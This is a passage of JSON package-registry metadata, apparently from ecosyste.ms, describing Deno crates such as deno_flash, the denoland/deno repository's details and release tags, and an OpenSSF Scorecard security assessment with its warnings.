https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cli_snapshots/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cli_snapshots/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cli_snapshots/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cli_snapshots/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cli_snapshots/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cli_snapshots/codemeta","maintainers":[{"uuid":"28170","login":"ry","name":"Ryan Dahl","email":null,"url":"https://github.com/ry","packages_count":18,"html_url":"https://crates.io/users/ry","role":null,"created_at":"2022-11-07T18:29:22.100Z","updated_at":"2022-11-07T18:29:22.100Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/ry/packages"},{"uuid":"45082","login":"piscisaureus","name":"Bert Belder","email":null,"url":"https://github.com/piscisaureus","packages_count":12,"html_url":"https://crates.io/users/piscisaureus","role":null,"created_at":"2022-11-07T18:29:22.129Z","updated_at":"2022-11-07T18:29:22.129Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/piscisaureus/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":5195691,"name":"deno_flash","ecosystem":"cargo","description":"DEPRECATED: Fast HTTP/1 server implementation for Deno","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":33,"first_release_published_at":"2022-08-25T00:56:50.727Z","latest_release_published_at":"2023-04-03T16:26:56.387Z","latest_release_number":"0.34.0","last_synced_at":"2026-08-29T21:57:10.221Z","created_at":"2022-08-25T01:06:01.832Z","updated_at":"2026-08-29T21:57:10.221Z","registry_url":"https://crates.io/crates/deno_flash/","install_command":"cargo install deno_flash","documentation_url":"https://docs.rs/deno_flash/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositori